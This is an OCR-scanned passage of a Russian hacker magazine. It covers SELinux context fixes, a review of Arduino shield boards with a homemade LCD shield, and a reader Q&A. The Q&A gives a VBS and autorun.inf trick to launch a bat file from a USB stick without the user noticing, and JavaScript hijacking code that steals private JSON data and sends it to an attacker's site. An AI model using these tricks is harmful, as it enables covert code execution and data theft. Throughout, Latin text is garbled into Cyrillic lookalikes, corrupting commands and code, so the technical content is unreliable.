вильныйтип объекта (Ьоте_біг_1; присваивается файлам, 
созданным в домашнем каталоге пользователя). Для полу- 
чения более детальной информации ЭЕЕіпих рекомендует 
выполнить командузеаіегі; -I бла-бла-бла. Эта команда вы- 
ведеточень информативное сообидение, где будутописаны 
все обстоятельства произошедшего, причины, по которым 
они могли возникнуть, а также пути решения проблемы. 

В нашем случае причина проста: админ переместил файл 
іпбех.ЫтІ из своего домашнего каталога с помоидью тѵ, 
выставил на него нужного владельца и права, но забыл из- 
менить контекст. Выхода из ситуации два. Либо присвоить 
файлу правильный контексте помоидью команды сЬсоп: 

# сбсоп -і Іі1;1;рсІ_5у5_соп1;еп1;_1; \ 
/ѵаг/ыыы/іііті/іпсіех. біті 



в том, чтосЬсоп изменяет контекст толь ко до следуюидей 
переиндексации, с помоидью гезіогесоп, которая сбросит 
контекст файлов каталога /ѵѵѵѵѵѵ до беі^аиім (по правилам 
политики все каталоги, не имеюидие родительского ката- 
лога, и их файлы получаюттакойтип). Поэтому мы должны 
изменить саму политику: 

# 5етапа§е -Рсопіехі -а -і Іі1:1;рсІ_5у5_соп1;еп1;_1: /ыыы 

# гезіогесоп -ѵ /ыыы 

Первая команда изменит политику та к, чтобы дефлтовым 
типом для каталога /ѵѵѵѵѵѵ и его содержимого был Ы;1;рб_ 
5у5_соп1;еп1;_1;, а вторая сбросит контекстего файлов, такчто 
они получат тот же тип (правила ЭЕЕіпихдопускают, чтобы 
дефолтовые метки каталогов и их содержимого отличались, 
но дляудобства зетападеделаетих одинаковыми). 

Также зетападе можетбыть использована для просмотра 
списка мета-правил: 

# 5етапа§е Ьооіеап -1 

С помоидью мета-правил можно контролировать та кие 
аспекты работы приложений, как, например, возмож- 
ность веб-сервера подключаться кудаленной базе данных 
(Ы;1;рб_сап_пе1;ѵѵогк_соппес1;_бЬ) или разрешение 1"1;р- 
сервера читать файлы домашнего каталога пользователей 
([1;р_Ьоппе_біг) и т.д. Такие правила группируют в себе боль- 
шое количество низкоуровневых правил, что суидественно 
упроидаетжизнь сисадмина. 

Чтобы включить/отключитьто или иное правило, можно 
использовать команду зеІзеЬооІ: 

# БеізеЬооІ Ы;1;рсІ_сап_пе1;ыогк_соппес1;_сІЬ оп 

# БеізеЬооІ Ы;1;рсІ_сап_пе1;ыогк_соппес1;_сІЬ оТТ 

Указав флаг«-Р», можно сделать эти правила постоянными 
между перезагрузками. В самом крайнем случае зетападе 
можно использовать для полного отключения проверок 
ЭЕЕіпих в отношении определенного субъекта: 

# 5етапа§е регшІББІѵе -а Ы;1;рс1_1; 

Включение производится с помоидью похожей команды: 




Подсистема ЭЕЕіпих 
отрабатывает после 
классического меха- 
низма управления до- 
ступом иМІХ, поэтому 
с его помоидью нельзя 
разрешить то, что 
уже запреідено с по- 
моидью традиционных 
прав доступа. 




> ѵѵагпіпд 

По умолчанию Іаг не 
сохраняет контексты 
безопасности файлов, 
что может привести 
к проблемам при по- 
следуюідей распаков- 
ке. Флаг «--зеііпих» 
исправляет это. 



Либо заставить систему «сбросить» контекст всех файлов 
каталога: 

# геБіогесоп -ѵ /ѵаг/ыыы/ЬітІ 

После перезапуска АрасЬе все должно быть ок. Однако этот 
метод не сработает, если мы захотим переместить корневой 
каталогАрасЬе в другое место (например, в /ѵѵѵѵѵѵ). Дело 



# Бетапа§е регшІББІѵе -сі Ы;1;рс1_1; 

Выводы 

ЭЕЕіпихдалеко нетакстрашен, како нем говорят. Система 
хотьи сложна в понимании, но невероятно логична иудобна 
в сопровождении, а имеюидиеся средства управления по- 
зволяюточеньточнодиагностировать проблемы и легко их 
устранять. ^ 
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РНКЕАКІЫС 



■ ■ Илья ісі Данилов (тк90.ги] 



ЭЛЕКТРОННЫЙ 

КОНСТРУКТОР 



Обзор лучших ЗНіеШ-плат для Агбиіпо 

О Агсіиіпо - крохотная плата с большими возможностями, типичный 
представитель Ореп Нагбѵуаге и одно из первых устройств, 
завоевавших широкую популярность у аппаратных хакеров. Не 
мудрено: удобный злектронный конструктор позволяет даже 
новичкам быстро разобраться и начать с нуля разрабатывать 
собственные устройства. 



Как быстро начать? 

Для быстрого начала новичку проще всего купить готовую плату — 
стоит она примерно $30. На плате будет всего два чипа — микро- 
контроллер АТМЕІ и микросхема ІІБВ-интерфейса, к которой он 
подключен. Все остальные элементы добавляются самостоятельно 
по мере необходимости. 

Программы для Агбиіпо (называемые на сленге «скетчами») пишут- 
ся на языке ѴѴігіпд. По сути, это обычный С++, расширенный спе- 
циальными процедурами типа «сІідіІаІѴѴгіІе» (записать значение в 
порт) или «апаІодРеасІ» (прочитать значение из АЦП). Осваивается 
все это в один-два присеста, особенно если у тебя уже есть опыт 
программирования на С++. Написанные скетчи компилируются и 
загружаются в Агсіиіпо через 05В с помощью среды АгбиіпоЮЕ 
( агсІиіпо.сс/еп/Маіп/ЗоІ'Іѵѵаге ). Чтобы собрать простейший проект 
требуются какие-то минут тридцать, без необходимости глубокого 
погружения в даташиты АТМЕЕ и конструкции ассемблера. Язык 
интуитивно понятен, а разобраться с нюансами поможет неплохой 
онлайн-хелп. Да и паять, кстати, тоже необязательно, если есть 
беспаечная макетка и набор проводков. 

Все выводы микроконтроллера выведены на два аккуратных ряда 
колодок, к которым можно подключать датчики, кнопки, дисплеи 
и тому подобное. Однако, чем сложнее обвязка, тем больше с ней 
может быть геморроя. Если речь идет про пару светодиодов и 
кнопок, то никаких сложностей. Но вот если требуется управлять 
моторами или обмениваться данными через радиоинтерфейс, воз- 
никает ряд сложностей. Для борьбы с этим пороком и придумали 
шилд-платы — готовые платы для расширения функциональности. 

Что такое ЗбіеІсІ-плата? 

БЫеІсІ-плата — это готовое решение для реализации частых задач, 
встающих перед разработчиками железа. Примерами таких задач 
могут быть и передача данных через радиоинтерфейс, и работа 



с Еібегпеі;, и управление электронными двигателями. Платы рас- 
ширения легко устанавливаются на Агсіиіпо, стыкуясь с колодками 
пинов и образуя весьма жесткую бутербродообразную конструкцию. 
Можно устанавливать несколько плат одновременно, главное, чтобы 
устройства не конфликтовали за одни и те же пины Агсіиіпо. Немного 
покопавшись в сети, можно найти таблицы со списком популярных 
шилдов и занятых ими пинов ( збіеІсІІізЕогд ). 

Дальше остается лишь подцепить соответствующую библиотеку к 
основному скетчу и опробовать работу схемы с помощью прилагае- 
мого к библиотеке скетча-примера. При таком подходе время эконо- 
мится дважды: сначала на разработку и отладку аппаратной части, а 
затем — программной. Однако по-настоящему удачных и популярных 
шилд-плат существует всего пара десятков. Чем хороший шилд 
отличается от плохого? 

В первую очередь, на нем обязана быть кнопка сброса. Оценить 
это может любой, кто отлаживал Агсіиіпо с одетым шилдом — штат- 
ная кнопка сброса становится недоступной и упражнения по ее 
нажиманию при помощи подручных продолговатых предметов 
порядком раздражают. Хороший шилд также должен быть совме- 
стим с Агсіиіпо Меда — если у тебя расширенная версия Агсіиіпо на 
АТтеда1280 или АТтеда2560, еще не факт, что с ней заработает 
шилд, созданный для привычной Ппо или Виетііапоѵа. А все из-за 
того, что в Меда отвечающие за аппаратный БРІ пины перенесли в 
другое место! Так что если шилд общается с Агсіиіпо по шине БРІ, 
обязательно изучи его «брюхо» — надеяться на совместимость с 
Меда можно, если ты увидишь там не только штырьки, но и черный 
квадратный разъем-розетку 2x3. Ниже я подготовил обзор лучших 
готовых БЫеШ-плат для решения частых задач. 

Управление моторами 

Если необходимо управлять моторами, смело используй шилд 
МоІогзЫеІсІ, созданный талантливым американским инженером 
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Последняя версия Агсіиіпо Упо 

Лимором Фридом ака Іасіуасіа [ ІасіѵасІа.пеІ/таке/тзкііеІсі/ 1. 

Главное преимущество шилда заключается в его универсально- 
сти, поскольку он поддерживает до четырех моторов прямого тока, 
до двух шаговых двигателей и двух серво-приводов. Можно ком- 
бинировать: например, один шаговый и два двигателя постоянно- 
го тока. Основу шилда обеспечивают две микросхемы счетверен- 
ного Н-моста Г2930, способные выдавать ток до 600 мА на канал и 
работать напряжениями от 4,5 до 36 В. Запараллелив входы одной 
микросхемы, можно отодвинуть ограничение по току до 1 ,2 А. С 
помощью этого шилда можно, например, управлять одновременно 
моторами и рулевой тягой модели гоночного автомобиля, шаговы- 
ми двигателями координатного стола. Для более мощных нагрузок 
можно использовать Агбиппоіо с чипом Г298 от фирмы Зрагкі^ип 
(два канала с токами нагрузки до 2 А) или ее более продвинутую 
версию Мопзіег Моіо ЗЫеШ ( зрагкі'ип.сопп/ргосіисіз/і 01 82 ) на 
двух чипах ѴМН25Р30, способную отдавать уже до 30 А с предель- 
ным напряжением 41 В. Если дело дойдет до последнего вари- 
анта, не забудь посоветоваться со знающими спецами: все-таки 
нагрузки довольно приличные, возможно придется обзавестись 
дополнительным радиатором, чтобы не обжечься. 

Работа с ЕІбегпеі 

Существуют два основных варианта шилдов для работы с ЕіЬегпеІ; 

— на основе старого доброго чипа ЕМС28360 от МісгосЫр и 
более совершенного ѴѴ51 00 от ѴѴігпеІ;. Оба решения используют 
для обмена шину 5РІ, отнимая всего четыре пина Агбиіпо. Но 
ЕМС28060 появился много раньше и явно проигрывает продвину- 
тому ѴѴ51 00: только 10 Мбит/с, нет аппаратной поддержки ІР, ОВР, 
ТСР Кроме того, ѴѴ5100 позволяет работать с четырьмя сокетами 
(что означает поддержку до четырех одновременных соединений). 

В общем, настоятельно рекомендую использовать именно ѴѴ5100, 
потому что он существенно экономит ключевой ресурс микрокон- 
троллера — оперативную память (5РАМ), которую приходится эконо- 
мить (у АіппедаЗЗЗ — всего один килобайт). Ну и все остальные пре- 
имущества предобработки налицо: пока ѴѴ5100 сам переспрашивает 
пакеты по протоколу ТСР и считает контрольные суммы заголовков, 
Аітеда может спокойно заниматься более важными вещами. 

Другим образцовым примером является шилд Агбиіпо ЕіЬегпеІ; 
ЗЫеШ ( агсІиіпо.сс/еп/Маіп/АгсІиіпоЕіЬегпеіЗЫеІсІ ) от команды 
Агсіиіпо. С его помощью можно создать скетч, который будет спосо- 
бен: 

• получать динамический ІР-адрес по ОНСР; 

• устанавливать время по протоколу МТР; 

• резолвить имена через ОМЗ; 

• проходить авторизацию через РАОШЗ; 




Пример многошилдового стекирования 




Только наличие на тыльной 




стороне разъема означает 
совместимость с Меда 



МоІогзИіеІсІ от Іасіуасіа 

• выполнять функции несложного ѴѴеЬ-сервера или выступать 
в качестве ѴѴеЬ-клиента, формируя запросы и осуществляя 
парсинг ответов. 

Из схожих плат можно отметить разработку Егееігопісз — 
ЕіЬегпеіЗЫеІсІ ѵѵііЬ РоЕ ( (гееІгопісз.сопп/ргосІисІз/еІбегпеІ-зЫеІсІ- 
ѵѵііЬ-рое ). Идея питания ЕіЬегпеІ-устройства от той же линии 
ЕіЬегпеІ;, к которой оно и подключено, родилась в 2001 году, а два 
года спустя стала официальным промышленным стандартом ІЕЕЕ 
802. ЗаЕ По собственному опыту замечу, что нет ничего удобнее для 
питания автономных коробочек, которые общаются по ЕіЬегпеІ; 
и разбросаны по зданию в радиусе 100 метров от специального 
питающего коммутатора. Стоит такой шилд чуть дороже, требует 
приобретения дополнительной микроплатки модуля РоЕ и вместо 
30-разъема имеет макетное поле. 
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РНКЕАКІЫС 




Ргеесіиіпо ЕІІіегЗО зіііеісі — поддержка ЕІІіегпеІ 10/100 и ппісгоЗО 



Применение такому шилду — исключительно в неподвиж- 
ных конструкциях, требующих взаимодействия по сети ТСР/ 

ІР. Например, отображение в браузер состояния подключенных 
датчиков или удаленное управление какими-то механизмами. 
Сразу вспоминается проект «твиттер-цветочка», в котором связка 
Агбиіпо+ЕіЬегпеІ; при помощи воткнутого в землю датчика влаж- 
ности через твиттер жаловалась на сухость и требовала немед- 
ленного полива. 

При всем многообразии применения ЕіЬегпеіЗЫеІсІ хочу пред- 
упредить о том, что каждая библиотека, безусловно, экономит 
время, однако и отнимает несколько килобайт флеш-памяти 
микроконтроллера. Поэтому, если рано или поздно упрешься в 
предельный размер 30 Кб своей Агбиіпо Пиетііапоѵа — подумай 
о замене на Меда 2560, памяти для скетчей будет раз в восемь с 
половиной больше. 

Использование 50-карт 

В проектах, связанных с накоплением какой-либо информации 
(например, 0Р5-координат), часто требуется нарастить объем 
доступной энергонезависимой памяти. Проще всего это сделать, 
подключив стандартную 50-карту. Для этого есть несколько гото- 
вых шилдов. Самый симпатичный из известных мне вариантов 
— ппісгоЗО ппосіиіе, разработан испанской фирмой ЕіЬеШипп, 
специализирующейся на мониторинге окружающей среды [ доо.ді/ 
іНСѵ4 ]. 

Шилд занимает всего одну колодку пинов Агбиіпо и позволяет 
работать с 50 и 50НС-картами, предварительно отформатирован- 
ными на в ЕАТ16 (предпочтительнее) или ЕАТ32. Единовременно 
можно работать только с одним файлом, длинные имена не под- 
держиваются. 

Беспроводные шилды 

Самые простые РЕ-модули на амплитудной модуляции (А5К), 
работающие в нелицензируемом диапазоне 433 и 313 МГц хоть 
и могут использоваться с Агбиіпо через библиотеку ѴігІиаІѴѴіге, 
но все равно представляются мне довольно плохим вариантом. 
Слишком сильно они подвержены помехам, устойчиво работают 
только на низких скоростях, не имеют аппаратного разделения 



на каналы — несколько одновременно работающих передатчиков 
будут мешать друг другу. Может быть, именно поэтому шилд-плат 
для них я пока не встречал. 

Полярную противоположность представляют платы семейства 
ХЬее, основанные на протоколах ХідЬее, идеально подходящие 
для организации распределенных сенсорных сетей с автономным 
питанием. Каждая такая плата сама по себе является устройством 
с микроконтроллером на борту, и от шилда требуется совсем 
немного — обеспечить согласование с Агбиіпо. Называются такие 
шилды обычно «ХЬее 5ЫеІсІ», но не всегда — например, ЫЬеШипп 
разработал Сопптипісаііоп 5ЫеІсІ ( доо.дІ/ОХРхІ ). Шилд обяза- 
тельно содержит два ряда колодок, к которым пристыковывается 
модуль в формате ХЬее. Единственный недостаток, пожалуй, 
это цена самого модуля ХЬее. Взамен получаем скорость до 250 
Кбит/с, дальность в пределах прямой видимости до 90 метров 
(модификация ХЬее РРО может добивать до 1,2 км), шифрование, 
экономное энергопотребление и возможность ретрансляции дан- 
ных (два модуля прозрачно общаются друг с другом через третий). 
Давно замечено, что если в компании заходит речь про бес- 
проводные сети, первым делом почему-то вспоминают про ѴѴіЕі, 
гораздо реже — про ВІиеІооіЬ. В качестве примеров подойдут 
ѴѴіЕІу 5ЬіеІсІ от 5рагкЕип ( зрагкГлг ' ' ім і і< ц'ис45/9954 ) и ВІиеІооіЬ 
тосіиіе от ЫЬеШипп ( соокіпд-Ьаскз.сот/іпсІех.рЬр/а гсіиіпо- 
Ыие1:оо1:Ь-тосІи[е-89.Ы:пп[ ). Последний выполнен в формате ХЬее 
и будет работать с любым переходным шилдом для ХЬее, а про- 
граммная настройка из АгЬиіпо напоминает диалог с модемом — 
через последовательный порт и АТ-команды. Кстати, в свое время 
была выпущена оригинальная плата АгЬиіпо ВТ ( агсіиіпо.сс/еп/ 
Маіп/АгсІиіпоВоагсІВІиеІооШ ). которая не имела П5В-интерфейса, 
но программировалась и подключалась к компьютеру именно 
через ВІиеІооіЬ. Большого распространения она не получила — 
может быть, в силу увеличения цены. 

Для обмена данными через 05М обычно используется мобильник, 
способный работать по последовательному порту на уровнях ТТЕ. 
Но сейчас таких все меньше и меньше — их вытесняет Ы5В, для 
работы с которым требуется быть хостом (а не девайсом, како- 
вым является Агсіиіпо). Но, к счастью, производители уже давно 
штампуют законченные 05М-модули, к которым остается при- 
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ѴѴІРІу-шилд от ЗрагШп 




ппісгоЗО-модуль от иЬеІІіит — совсем крохотный 




«В проектах, связанных с 
накоплением какой-либо 
информации (например, 
ОР5-координат), часто 
требуется нарастить объем 
доступной энергонезависимой 
памяти» 

крутить внешнюю антенну и разъем симки. За примером далеко 
ходить не надо — 0РР5 ОиасІЬапсІ тосіиіе Ьг Агсіиіпо от ЫЬеШит 
[ доо.дІ/КиеРН ]. который базируется на 0РР5-модеме от 5А0ЕМ. 
Особенность именно этой модели — 0РР5-модуль съемный, и 
можно передавать не только данные — разведен выход на внеш- 
ний спикерфон. 

Разные шилды 

Подводя краткий итог, можно с уверенностью сказать — решения 
почти всех типичных задач давно суідествуют в виде шилдов. Но 
не стоит думать, что на этом все заканчивается. Вот несколько 
примеров: Расііаііоп Зепзог Воагб от ЫЬеШипп (счетчик Гейгера). 

И вроде бы идея не нова — но все равно, пока Фукусима не гря- 
нула, никому в голову не пришло запустить подобное в серий- 
ное производство. Другая интересная идея заложена в основу 
Зееесіиіпо Біаікег — она способна при необходимости быть и 
Агбиіпо-совместимой платой, и шилдом, что достигается при 
помоіди двух параллельных рядов контактов. В настояідий момент 
идет активная разработка П5В Нозі; ЗЫеІсІ — он позволит под- 
ключать к Агбиіпо устройства, подключаемые в обычных условиях 
к компьютеру. Суідествует также масса шилдов для индикации — 
начиная с семисегментных дисплеев, заканчивая ТРТ-экранами с 
тачскином. Меня больше всего заинтересовал ГоГ-ЗЫеІсІ. Вроде 
бы простая матрица из светодиодов, но на принципе хекосплек- 
сирования. Этот хитрый прием использует возможность пинов 
Аітеда находиться в трех состояниях (О, 1 и высокое сопротив- 
ление). В результате усердной пайки 126 светодиодов, получаем 
полноценную матрицу 9x14, не израсходовав даже всех пинов 
Агбиіпо, а в качестве примеров к библиотеке предлагаются игры 
«Жизнь», «Тетрис», «Пинг-понг» и «Брасе Іпѵасіегз». 

Поэтому, если у тебя есть свободное время и оригинальная идея 




Іоі БИіеІсІ на красных светодиодах 



— обязательно найди время поделиться с сообідеством — гля- 
дишь, тебе и схему поправят, и с разводкой помогут. Ведь нет 
ничего более захватываюідего, чем коллективное творчество. 

Шилд своими руками 

В качестве примера создадим свой собственный ГСО-шилд. 

Схема подключения популярного алфавитно-цифрового ЖКИ- 
дисплея 1602 на контроллере НВ44780 возможна в двух вари- 
антах — восьмибитной шиной или четырехбитной. Самое время 
открыть стратегию шилдостроения Агбиіпо: пинов много не 
бывает! Стараемся использовать их по минимуму и поэтому 
выбираем четырехбитную схему (на наше счастье, поддержка 
такой схемы входит в дистрибутив АгсІиіпоІОЕ, в виде библиотеки 
ЫдиісІСгузІаІ). 

Используем для построения нашего шилда специальную заготов- 
ку — протошилд, который представляет собой макетную плату с 
небольшими изысками. Самая главная его ценность — это пра- 
вильно расставленные отверстия для пинов, для идеальной сты- 
ковки с Агбиіпо. Так уж получилось, что все колодки пинов рас- 
положены на сетке с шагом 2,54 мм, кроме одной (если бы не этот 
досадный факт, можно было бы взять любой кусочек «дырчатой 
макетки» и впаять в него стыковочные вилки РЕБ). Сделано это 
было специально, чтобы реципиент по рассеянности не вставил 
шилд наоборот и не пожег на корню будуідий шедевр. 

Обрати внимание, что схема предусматривает наличие перемен- 
ного резистора для регулировки контрастности. Это важно! Если 
забить на это, при правильной в остальном схеме и скетче ничего 
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РНКЕАКІЫС 





Схема подключения ЖКИ-дисплея на Н044780 




Совсем немного пайки — так и схема несложная... 

ВИДНО не будет. Подойдет любой на 10-20 кОм, а конкретно на 
этом протошилде он уже и так предусмотрен — правда подключен 
ко входу апаІодО, поэтому придется припаять лишний проводок. 
Возьмем кусочек штыревой гребенки Р15 и распаяем сначала 
на контакты дисплея, а затем — на шилд. После этого надо взять 
монтажный провод и аккуратно, по очереди, зачистить и напаять 
проводки от дисплея к пинам Агбиіпо согласно схеме — благо, 
она несложная. У меня интуитивным образом получилось упрятать 
большую часть под дисплей. 

Оденем полученный результат на Агбиіпо и загрузим первый 
тестовый скетч-пример из каталога ЫриісІСгузІаІ. Ничего нет на 
экране? Или куча черных квадратиков? Не беда, самое время 
подкрутить переменный резистор — уверен, что-то обязательно 
появится! В этом случае можешь облегченно вздохнуть — теперь 



Читать текст на родном языке всегда приятнее! 

у тебя есть первый шилд собственного изготовления. Ну и раз уж 
он заработал — можно заодно его русифицировать. В свое время 
я изменил стандартную библиотеку так, чтобы символы кирилли- 
цы корректно транслировались из ІІТР-8 в знакогенератор дис- 
плея. Иіди последнюю версию библиотеки на ді1:ЬиЬ.сопп/ппк90 . ^ 




Типичный протошилд 
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Есть вопросы — присылай 
на 1ад@геа1.хакер.ги 



О: Каким образом можно дешево поднять 

5ІР-05М-ШЛЮЗ? 

А: Хороший подарок в решении этой про- 
блемы сделали нам сотовые операторы, 
которые практически бесплатно раздают 
30-модемы по разным акциям. Несмотря на 
цветастые логотипы, большинство из них 
родилось в Китае на фабриках компании 
ХТЕ или Ниаѵѵеі. Проверенным вариантом, 
который подойдет для решения постав- 
ленной задачи, является Ниаѵѵеі е1 550, 
умеюидий передавать голос в 05М. Тут 
надо сказать, что 30-модемы продаются 
залоченными на конкретного оператора, 
а возможности для голосового обидения у 
них урезаны на программном уровне. И то 
и другое без труда обходится с помоидью 
многочисленных инструкций, которые дав- 
но разлетелись по всему рунету. На форумах 
есть и нужные прошивки — короче говоря, 
маленькое недоразумение решается быстро 
и недорого. Таким образом, с помоидью 
устройства, которое стоит две копейки, 
можно звонить и принимать входяидие вы- 
зовы. 

Хорошо, но какэто не использовать для 
создания 51Р-08М-шлюза? На компьютер с 
подключенным модемом устанавливается 
51Р-клиент, который дергает голос в обе 
стороны с этого модема и направляет на 
51Р-сервер (азіегізк, окіеіі, зірпеі и т.д.). 

В результате получается 08М-81Р-шлюз. 



Особого внимания здесь заслуживает 
программа Окіеіі 8ІР-08М Оаіеѵѵау ( ѵѵѵѵѵѵ. 
Іеізѵзіеппз.ги/даіеѵѵаѵз ]. которую специ- 
ально разработали для создания шлюза с 
использованием 30- модеме в. На текуидий 
момент поддерживает следуюидие девайсы: 
Ниаѵѵеі Е1550, Ниаѵѵеі ЕІбОд, ХТЕ МЕ180. 
Технология, на самом деле, не новая: ки- 
тайцы давно производят шлюзы Ѵ 0 ІР-О 8 М в 
железном корпусе. Но оцени разницу в цене: 
стоим ость та ко го девайса на одну симку на- 
чинается от $300 (модем, напомню, продают 
за 700-800 рублей, а то и вовсе дарят). Воз- 
можно, в ближайших номерах мы сделаем об 
этом подробную статью. А пока рекомендую 
почитать ЬіТІѵ/аММОТР . 

О: В АсІоЬе РІазІі есть опция для преобра- 
зования 5\Л/Р-с|эайлов в Ю5-приложения. 
Кажется, со стороны Арріе некоторое 
время даже был запрет на использова- 
ние подобных технологий, позволяю- 
щих создавать программы для іРИопе/ 
іРасІ сторонними средствами. Скажи, 
имеет ли подобная с|эункция право на 
существование или это просто пунктик в 
списке опций для красного словца? 

А: За отчетом я обратился к нашему автору - 
Евгению Кузьмину, который профессиональ- 
но занимается разработкой под і08, и вот 
что он ответил: «Для очень простецких игр 
и несложных приложений, где нетфизики. 



кучи спрайтов и прочих наворотов, такая 
возможность может быть и сгодится. Но для 
серьезных разработок она, честно скажу, 
слишком тормозная». Так что, увы, если есть 
желание разрабатывать игры для іРЬопе/ 
іРаб, то без изучения ОЬ)ес 1 ;іѵе-С - никуда. 

О: Можно ЛИ каким-нибудь образом не- 
заметно запустить Ьа1-с|эайл с с|элешки? 

А: Теперь, с учетом того, что компания 
Місгозоі'і; фактически отрубила возмож- 
ность автозапуска с флешки, сделать это 
будет нелегко. Но на старых непропатченных 
системах сработаеттакой трюк: 

1 . Закидываем на флешку ппубІе.ѵЬз со сле- 
дуюидим содержанием: 

5е1: 1лІ5Іі5Ііе11 = Сгеа1;еОЬдес1;( 

"1лІ5сгір1: .51іе11") 

1лІ5Іі5Ііе11 . Кип "сшсі.ехе /с 
[ИИЯ_ВАТ_ФАЙЛА]% 0^ -Раізе 

2. В аиіогип.іпі" добавляем следуюидее: 

[АиІіоКип] 
и5еАи1;оР1ау=1 
ореп=ту1і1е. ѵЬб 

Обрати внимание, что хотя для пользователя 
запуск будет незаметным, некоторые анти- 
вирусы забьюттревогу и предупредят юзера 
о подозрительных файлах на ОЗВ-носителе. 
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^Настройка ОкІеІЕ 5ІР-6БМ даіеѵѵау 

^ НасіроЛяа ' ■ і , . , - , ;,і. 

НастроАи уст^нойлемных мц^нов 




Настраиваем шлюз 05ЛЛ-ѴоІР на базе 
30-модема 



О: Веду небольшой проект который 
стремительно развивается. Поскольку 
через сайт ведутся операции с кре- 
дитными картами, хочу обзавестись 
полноценным 551-сертификатом. Под- 
хожу к безопасности серьезно. Сколько 
стоит 551-сертификат для сайта? Есть 
ли какой-то вариант получить его бес- 
платно? 

А: Полноценный 551-сертификат, какты 
правильно понимаешь, за просто так никто 
не выдает. Правда, есть возможность бес- 
платно обзавестисьтриальным сертифи- 
катом на ограниченный срок (на 30 или 90 
дней). Тест-драйв в частности можно зака- 
зать через сайт уууууу.[гее55[.5и . Как говорят 
владельцы сервиса, «такой сертификат 
предназначен для тестирования техниче- 
ской инфраструктуры до покупки коммер- 
ческого 551-сертификата». Что удобно, 
выпускается он в течение нескольких минут, 
а для его получения достаточно заполнить 
простую форму: 

Уоиг Маше: 

Ехатріе: ЗоЬп 5ті1;Іі 
Уоиг Е-таі1: 

Ехатріе: 1;е5І:@ехатр1е . сот 
Рбопе: 

Ехатріе: 8(495)2295670 

Беіесі; 1;Ііе зегѵег 5оТі;ыаге изесі 1:о 

§епега1:е 1:Ііе С5К: 

Ехатріе: АрасІіе-551 
С5К: 

Ехатріе: 

ВЕСIN СЕКТІРІСАТЕ КЕдУЕЗТ 

МII^^^ССАгкСА^АысIТЕ1лIIЧВ^СА1^ЕАxМNсIСV2СІ 

С502ХМ01тМѵЬТЕ5МВА6АіиЕСхШ 

Т1лIРуа2V0а1лI5пIЧКЕы^ыУ^V^^КЕыI^^2XN0IЕ9у2 

2Е5ІЧВА6АіиЕВхМ1ѴСѴ2СІСВ0аХК5 



Кр+ЫІг5Х5ідсІ2уР1рІрР1Мск5Ѵе1еС20К9/ 

0ек65Кпо7оы4ТѴухАР616О20аы7е 

6І5■Р2ы40V^Т0/6I6ѵК2^X0і+1;58КР^81лIУТОсТ 

К1РпкС8В/иѴ 

ЕМО СЕКТІРІСАТЕ КЕдУЕБТ 

Вопросы может вызвать только последнее 
поле — С5Р (Сегіібсаіе 5ідпіпд Редиезі;). 
Сюда нужно вставить информацию отвоем 
сертификате, включая публичный ключ 
(РиЫіс Кеу). Сгенерировать его можно через 




Используем 00 01)1 для просмотра 
отреверсенного кода АпсІгоісІ- 
приложения 

орепззі (подробнее читай в статье ѵѵѵѵѵѵ. 
І^гееззІ.зи/агІісІез/ІЗ ]. А чтобы подключить 
сертификат потребуется настройка тоб_зз[ 
для Арасбе (считаем, что в качестве веб- 
сервера ты используешь именно его). Весь 
процесс пошагово описан в этом материале 
— \л/\л/ѵѵТгеезз[.зи/агбсІез/14 . 

О: Объясни на пальцах, что такое 
Заѵа5сгірІІіііаскіпд? 

А: Лучше всего на этот вопрос ответит наш 
автор - Тарас Иваиденко ( охсІебіпЬ ). 

Атака известна достаточно давно (статья по 
теме - Ы1:.[у/]0М1ру) и втекуидих версиях боль- 
шинства веб-браузеров уже неактуальна. 

Тем не менее, остаются старые веб-браузеры 
и вариации атаки с форматом 350МР. В двух 
словах, атака основана на возможности в 
ЗаѵаВсгірІ; переопределить «сеттеры» для 
свойств объектов. 

Допустим, уязвимое веб-приложение пере- 
дает в 350М -формате какие-либо критичные 
данные воттак: 

[{"■Роо" : "ргіѵаііе сіа1:а"}] 

Злоумышленник может сделать специ- 
альную страницу с35-кодом, в котором 
переопределяет «сеттер» для свойств объ- 
екта. Таким образом, при инициализации 
свойства Ьо сработает «триггер», в котором 
значение этого поля и сдампится: 

ОЬдесІ: . рго1:о1;уре . сіе1іпе5е1:1;ег 

("Тоо'Ч -Рипс1;іоп(х) { 

ѵаг 5 = 

■Рог (-Р ІП ІІІ1І5) { 

5 += -Р + ■■: + 1;Ы5[-Р] + 

} 

5 += "-Роо: " + х; 

// пересылаем строку 5 обычным 
// добавлением картинки на сайт 
// злоумышленника 
}); 

</5сгір1:> 

<5сгір1; 5гс="Іі1:1;р://1:аг§е1:.сот/ 
ргіѵа1:е/сіа1;а о’5"х/5сгір1;> 

С 350МР, с учетом его предназначения, 
еіде проіде: достаточно просто передать в 
качестве параметра подключаемого скрипта 




Двухфакторная авторизация, которая 
легко подключается к любой системе 



название определенной функции. Получен- 
ный ответ будет в та ком виде: 

еѵі1Рипс1:іоп({"рарег" : "А4'5 "соипі;": 

5}) 

То есть будет вызвана функция, опреде- 
ленная злоумышленником, в которую будет 
передана в качестве параметров информа- 
ция суязвимой страницы. 

О: Передо мной стоит задача — создать 
мощное приложение, которое выгляде- 
ло бы, как обычное десктопное. Какой 
фреймворк выбрать? 

А: Мой совет - ЕхУ5 ( ѵѵѵѵѵѵ.зепсба.сопп ). кото- 
рый развивается уже оченьдавно и позволяет 
разрабатывать веб-страницы, которые будут 
практически неотличимы отобычного при- 
ложения. Элементы интерфейса, перетаски- 
вание, мгновенное обновление содержания, 
окна итаскбары, моидныетаблицы — все это 
уже реализовано в одном, почти мегабайтном 
файлике кода. ЕхУ5 предоставляет компо- 
нентную модель построения, гибкую систему 
стилизации и расширения языка Заѵа5сгір1; 
для болееудобной разработки. За это, конеч- 
но, приходится платить снижением произво- 
дительности, но для многих это мелочь. 

О: Как грамотно отсечь пользовате- 
лей со старыми браузерами, выдав им 
предупреждение о необходимости 
обновиться? 

А: Теперь даже гиганты вроде Ооодіе 
начинают отказываться от поддержи уж 
слишком устаревших браузеров, закапывая 
в могилу 6-го ослика. Для)0иегу, всенародно 
любимой ^5-библиотеки, доступен плагин, 
чтобы одной строкой отсекать несознатель- 
ных пользователей ( ]диегу.1:бе\л/ікіе5.сопп/ 
Ьгоѵѵзег ). Отличный вариант. 

О: Как ускорить /Ѵ\у501? 

А: Последние версии мускула достаточно 
быстрые, но с осознанием того, что по50Е 
не потеснить, ребята придумывают еш,е 
более радикальные методы увеличения 
производительности. Для особых случаев 
есть НапбІегЗоскеІ; Ріидіп, который может 
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работать с таблицами гораздо эффектив- 
нее, используя легковесный сетевой слой 
и простой протокол вообще без всякого 
801. Такие решения позволяют серверу 
